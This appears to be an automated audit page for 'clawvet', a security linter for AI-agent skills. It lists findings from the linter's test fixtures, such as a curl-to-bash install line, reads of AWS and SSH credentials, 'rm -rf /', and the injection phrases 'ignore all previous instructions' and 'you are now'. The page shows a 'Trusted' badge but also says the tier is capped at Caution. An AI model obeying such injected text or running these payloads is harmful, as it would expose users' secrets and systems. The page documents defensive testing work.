ClawAudit verdict

clawvet

🟢 Trusted

Low risk — reviewed by ClawAudit, behavior matches stated purpose

The skill is a security linter for OpenClaw skills that runs static analysis, metadata validation, and typosquat detection; it has no capabilities listed and the executionSinkDetected flag reflects npx usage for the linter itself, which is appropriate.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

security

100

transparency

100

maintenance

Findings (34)

Pattern match critical

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

apps/api/test/fixtures/malicious-stealer/SKILL.md · code · curl -sL https://raw.githubusercontent.com/totally-legit/helper/main/setup.sh |

Pattern match critical

Pipe to bash — executes piped content as shell commands

apps/api/test/fixtures/malicious-stealer/SKILL.md · code · | bash

Pattern match critical

Accesses AWS credentials file

benchmarks/malicious/credential-theft/SKILL.md · code · ~/.aws/credentials

Pattern match high

Prompt injection — tries to override agent instructions

apps/api/test/api.test.ts · prose · downgraded · ignore all previous instructions

Pattern match high

References child_process — can spawn system processes

benchmarks/malicious/rce-base64/SKILL.md · code · child_process

Pattern match high

Pipe to sh — executes piped content as shell commands

apps/api/test/edge-cases.test.ts · prose · downgraded · |sh

Pattern match high

Uses eval() — can execute arbitrary code

apps/api/test/edge-cases.test.ts · prose · downgraded · eval(

Pattern match high

os.system/popen — direct OS command execution

apps/api/test/fixtures/obfuscated-payload/SKILL.md · code · os.system(

Pattern match high

Recursive delete from root or home — destructive command

apps/api/test/edge-cases.test.ts · prose · downgraded · rm -rf /

Pattern match high

Accesses .ssh directory

benchmarks/malicious/credential-theft/SKILL.md · code · .ssh/

Pattern match high

Accesses cloud provider credentials

benchmarks/malicious/credential-theft/SKILL.md · code · ~/.aws

Pattern match high

Instructs agent to read sensitive file paths

apps/api/test/fixtures/sneaky-injection/SKILL.md · prose · downgraded · Read all files in ~/

Pattern match high

Bash /dev/tcp — raw TCP connection via shell

apps/api/test/regex-safety.test.ts · prose · downgraded · /dev/tcp/

Pattern match high

Accesses sensitive system files

apps/api/test/regex-safety.test.ts · prose · downgraded · /etc/passwd

Pattern match high

Uses exec() — may execute shell commands

benchmarks/malicious/obfuscated-shell/SKILL.md · code · exec(

Pattern match high

Hex-encoded string — possible obfuscated payload

benchmarks/malicious/obfuscated-shell/SKILL.md · code · \x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73

Pattern match medium

Accesses sensitive environment variables

benchmarks/malicious/credential-theft/SKILL.md · code · process.env.ANTHROPIC_API_KEY

Pattern match medium

Dynamic import() — loads module at runtime

apps/api/src/routes/auth.ts · prose · downgraded · import("

Pattern match medium

Accesses system credential store

apps/api/test/edge-cases.test.ts · prose · downgraded · keychain

Pattern match medium

Possible prompt injection — attempts to redefine agent identity

apps/api/test/edge-cases.test.ts · prose · downgraded · you are now

Pattern match medium

Instructs covert action — may act without user awareness

apps/api/test/fixtures/sneaky-injection/SKILL.md · prose · downgraded · silently

Pattern match medium

Uses spawn() — can execute external programs

apps/api/test/regex-safety.test.ts · prose · downgraded · spawn(

Pattern match medium

References sudo — requests elevated privileges

apps/api/test/regex-safety.test.ts · prose · downgraded · sudo

Pattern match medium

String.fromCharCode — can build strings to evade detection

benchmarks/malicious/obfuscated-shell/SKILL.md · code · String.fromCharCode

Pattern match medium

References SSH/GPG private keys

apps/api/test/regex-safety.test.ts · prose · downgraded · SSH_KEY

Pattern match medium

Accesses Kubernetes config (may contain cluster credentials)

apps/api/test/regex-safety.test.ts · prose · downgraded · ~/.kube/config

Pattern match medium

Base64 decode (atob) — may hide malicious payloads

packages/shared/src/patterns.ts · prose · downgraded · atob(

Pattern match medium

setuid — privilege escalation mechanism

packages/shared/src/patterns.ts · prose · downgraded · setuid

Pattern match low

Makes HTTP request to external URL

benchmarks/malicious/credential-theft/SKILL.md · code · fetch('https://

Pattern match low

References agent memory files

apps/api/src/services/semantic-analysis.ts · prose · downgraded · MEMORY.md

Pattern match low

References tunneling service

apps/api/test/edge-cases.test.ts · prose · downgraded · ngrok

Pattern match low

Sets world-executable permissions

apps/api/test/regex-safety.test.ts · prose · downgraded · chmod 777

Pattern match low

Base64 encoding/decoding

apps/api/test/regex-safety.test.ts · prose · downgraded · BASE64_DECODE

Pattern match low

Popular HTTP library — network access

packages/cli/src/commands/scan.ts · prose · downgraded · Got

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/B/C/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

Requires 2 system binaries. (1 elevated: npm).

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API